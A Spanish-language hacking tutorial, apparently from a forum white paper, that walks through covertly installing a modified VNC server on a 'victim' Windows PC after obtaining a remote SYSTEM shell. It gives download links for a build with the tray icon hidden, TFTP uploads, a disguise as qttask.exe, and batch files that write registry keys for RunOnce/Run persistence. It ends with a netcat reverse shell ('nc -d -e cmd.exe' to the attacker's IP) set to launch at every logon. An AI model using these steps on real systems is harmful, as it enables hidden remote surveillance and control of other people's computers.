El servidor de la aplicación es aquello que queremos instalar en la víctima. El cliente de la aplicación es lo que utilizará el atacante para obtener el escritorio remoto de la víctima.

Podemos descargarnos la versión oficial de VNC desde:
ftp://ftp.uk.research.att.com/pub/vnc/dist/ y buscamos vnc-3.3.2r6_x86_win32.zip

Mirror: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=63
(Es importante que nos descarguemos esta versión en concreto)

Una característica a tener en cuenta sobre el servidor VNC, es que durante su ejecución muestra un Tray Icon (Icono en la barra de tareas). En principio, esto no supone una molestia, ya que no estamos atacando a ninguna víctima real, sino a un equipo de pruebas de nuestra red ;) pero como soy muy quisquilloso y me gusta
tener muy limpio el escritorio, vamos a intentar ocultar el Tray Icon de la barra.

Lamentablemente, el servidor VNC no permite ocultar este icono de manera sencilla, así que tendremos que hacer uso de una versión modificada del código fuente original, que oculta el Tray Icon. Podemos descargarnos esta versión modificada de VNC desde:

http://www.ssimicro.com/~markham/vnc/vnc-3_3_2r6_x86_win32_notray.zip

Mirror: http://ns2.elhacker.net/rojodos/descargas/pafiledb.php?action=download&id=64

Ahora ya podemos instalar la aplicación VNC en el equipo atacante. Descargamos el archivo vnc-3.3.2r6_x86_win32.zip original, lo descomprimimos e instalamos. Se creará una carpeta llamada

C:\Archivos de programa\ORL\VNC donde encontraremos, entre otros archivos, el Servidor (WinVNC.exe) y el cliente (vncviewer.exe).

Antes de subir nada a la víctima, necesitamos configurar el Servidor VNC o, de otro modo, no podremos conectarnos con la víctima!

Así pues, ejecutamos WinVNC.exe y nos aparecerá una ventana de propiedades. Comprobamos que en Display Number pone 0 y en Contraseña agregamos la que queramos. Podemos cerrar el Servidor.

Por último, sustituimos el Servidor ejecutable original, localizado en

C:\Archivos de programa\ORL\VNC\WinVNC.exe, por el modificado
para que no muestre el Tray Icon.

Todo el proceso de instalación y configuración del Servidor VNC en el equipo local del atacante, dará lugar a la creación de una clave en su registro que contiene la siguiente información de configuración:



3) SUBIENDO A LA VÍCTIMA LOS ARCHIVOS NECESARIOS PARA LA EJECUCIÓN DEL SERVIDOR VNC
Después de haber obtenido una shell remota de la víctima, podemos subir vía TFTP los archivos necesarios para poder ejecutar el Servidor VNC en el sistema de la víctima.

Además de los propios archivos del servidor VNC, necesitamos agregar la información de configuración del servidor VNC en el registro de la víctima. Llevaremos esto a cabo utilizando archivos de lotes .bat.

Colocamos en la carpeta de nuestro Servidor TFTP los archivos:

1) WinVNC.exe, localizado en C:\Archivos de programa\ORL\VNC
2) VNCHooks.dll, localizado en C:\Archivos de programa\ORL\VNC
3) omnithread_rt.dll, localizado en C:\WINDOWS\system32
4) El siguiente archivo addRegNow.bat, que contiene:

@echo off
REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d
32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f

No es muy difícil adivinar que esta información, volcada del propio registro local del sistema atacante, tiene que ser agregada en el registro remoto del sistema víctima.

Básicamente, podéis utilizar este mismo contenido, salvo el código encriptado de la contraseña, que debe ajustarse a la que utilizáis.

Subimos a la víctima estos archivos a través de TFTP (podéis utilizar otras vías, como FTP, recursos compartidos, etc.)



4) EJECUTANDO EL SERVIDOR VNC EN EL SISTEMA DE LA VÍCTIMA

Antes de ejecutar el propio servidor WinVnc.exe, al que hemos renombrado como qttask.exe ;) , necesitamos agregar la información de configuración del Servidor VNC en el registro de la víctima. De otro modo, cuando el servidor .exe sea ejecutado, acudirá al registro de la víctima para configurar, entre otros valores, la contraseña de acceso por defecto y al no encontrarla, se mostrará la ventana de
propiedades del Servidor VNC en el escritorio remoto de la Victima, esto es, FRACASO!.

Así pues, añadimos la información contenida en el archivo addRegNow.bat en el registro remoto de la víctima. Para llevar esto a cabo, programamos una tarea en el sistema con el comando at:


Cuando llegue el momento, se ejecutará la tarea, no aparecerá ninguna ventana de ejecución del .bat y se agregará toda la información contenida en addRegNow.bat en la siguiente clave de registro:

HKEY_USERS\.DEFAULT\Software\ORL

Comprobamos, por supuesto, que la tarea se ha realizado con éxito:
Con la información de configuración del Servidor VNC ya cargada en el registro de la víctima, ya podemos proceder a ejecutar el servidor qttask.exe. Llevaremos esto a cabo programando otra tarea en el sistema.

Nota: Ya que estamos trabajando con una shell remota con privilegios de SYSTEM, si simplemente ejecutamos el comando Start qttask.exe, el Servidor VNC se ejecutará y aparecerá en la lista de procesos del sistema bajo el nombre de usuario SYSTEM, pero la aplicación NO correrá en el mismo contexto que el usuario víctima y
no podremos conectarnos desde el cliente atacante.

Para solucionar este problema, tenemos que programar una tarea en el sistema utilizando el parámetro /interactive.

/interactive - Permite a la tarea interactuar con el escritorio del usuario
cuya sesión coincide con el momento de ejecución de la tarea.

Comprobamos que la tarea se ha llevado a cabo con éxito y si es así,
ya estamos listos para conectarnos remotamente desde el cliente
atacante.

Se han detectado algunos problemas al conectarse desde determinadas versiones de clientes VNC. Por si acaso, podéis descargaros la última versión del cliente VNC desde:

http://www.realvnc.com/dist/vnc-4.0-x86_win32_viewer.exe

Ejecutamos el cliente y configuramos las Opciones del VNC Viewer. Si no queremos interactuar con el escritorio de la víctima, sino únicamente visualizarlo, desmarcamos todas las casillas de la pestaña Inputs.

Introducimos la IP de la víctima, la contraseña de acceso y, por arte de magia, obtenemos su escritorio remoto… me encantan estos momentos :)

4) PREPARANDO LA INSTALACIÓN DEL SERVIDOR VNC COMO SERVICIO EN EL SISTEMA DE LA VÍCTIMA

Si queremos garantizar futuros accesos a la víctima, aún cuando esta reinicie su equipo, tenemos que instalar el Servidor VNC como servicio. Para ello tenemos que seguir minuciosamente estos pasos:

Agregar en HKEY_CURRENT_USER\Software\ORL\WinVNC3 toda la información de configuración del servidor VNC.

Ya sé que antes hemos agregado esta información en HKEY_USERS\.DEFAULT\Software\ORL, pero es que estábamos trabajando con una shell remota bajo el contexto SYSTEM y ahora
queremos que el servidor VNC se ejecute bajo el contexto del USUARIO que inicie Windows.

Para agregar esta información en dicha clave del registro de la víctima, colocaremos un archivo addReg.bat en la clave de registro

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curren
tVersion\RunOne.

Tenemos dos ventajas al agregar la entrada allí:

1.- el archivo bat se va a ejecutar antes de cargar el escritorio (cuando está la pantalla de bienvenida).
2.- una vez ejecutada la entrada, automáticamente se borra.

El contenido de ese archivo addReg.bat será el siguiente:

REG ADD HKEY_CURRENT_USER\Software\ORL
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v AutoPortSelect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v InputsEnabled /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollConsole /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v OnlyPollOnEvent /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v Password /t REG_BINARY /d
32149bb09b18f887 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollForeground /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollFullScreen /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v PollUnderCursor /t REG_DWORD /d 0 /f
REG ADD HKEY_CURRENT_USER\Software\ORL\WinVNC3 /v SocketConnect /t REG_DWORD /d 1 /f
REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winvnc /t
REG_SZ /d "C:\WINDOWS\system32\qttask.exe"

Cuando la víctima reinicie su sistema e inicie Windows, se ejecutará el archivo addReg.bat y añadirá su contenido en el registro local.

Ahora ya subimos el archivo addReg.bat a través de TFTP y ejecutamos el comando que crea la clave de inicio que añadirá el contenido de addReg.bat al registro de la víctima.

4) INSTALACIÓN AUTOMÁTICA DEL SERVIDOR VNC COMO SERVICIO EN EL SISTEMA DE LA VÍCTIMA

Ahora ya podemos esperar sentados a que la víctima reinicie su equipo. Cuando esto ocurra, se ejecutará la clave de inicio en \RunOnce y se cargará el contenido de addReg.bat en el registro de la víctima. En ese momento, se cargará:

- la información de configuración del servidor VNC en la clave por
defecto HKEY_CURRENT_USER\Software\ORL

- un clave de inicio en
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Current
Version\Run para que el Servidor VNC arranque automáticamente
en los sucesivos inicios de Windows.

- el servidor VNC, ejecutándose con privilegios de USUARIO. (Esto
deriva del punto anterior...)

Nos podemos conectar remotamente con el cliente Vnc Viewer...


5) SERVIDOR VNC YA INSTALADO COMO SERVICIO EN EL SISTEMA DE LA VÍCTIMA

En el siguiente reinicio de la víctima y posterior inicio de Windows ya habrá desaparecido la clave en RunOnce (1 única ejecución) y el servidor VNC se ejecutará automáticamente desde la clave de inicio

KEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Nos podemos conectar remotamente con el cliente Vnc Viewer...


6) ¿Y SI EL SERVIDOR CAMBIA DE IP TRAS REINICIAR?

En el caso de que estemos trabajando en un contexto de Internet y la
víctima tenga IP dinámica, puede que su dirección IP cambie después de reiniciar su equipo.

Para ello, desde la shell remota agregamos una entrada en el registro de la víctima para que nos devuelva una reverse shell cada vez que inicie sesión en Windows.

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v
Netcat /t REG_SZ /d "C:\WINDOWS\system32\nc -d -e cmd.exe xx.xx.xx.xx 6000"

Sustituimos la xx.xx.xx.xx por nuestra dirección IP.

Y no olvidéis dejar el nc a la escucha en el equipo atacante:

nc -l -p 6000 -vv

AGRADECIMIENTOS especiales a estas persona y comunidades que realizaron este White Paper!. Realicen su Buen laboratorio 8~)

http://foro.elhacker.net/
http://www.hackxcrack.com/phpBB2/index.php
Gospel @ unrayodesoul[at]hotmail[dot]com
Zhyzura @ zhyzura[at]gmail[dot]com



Good Luck

Dino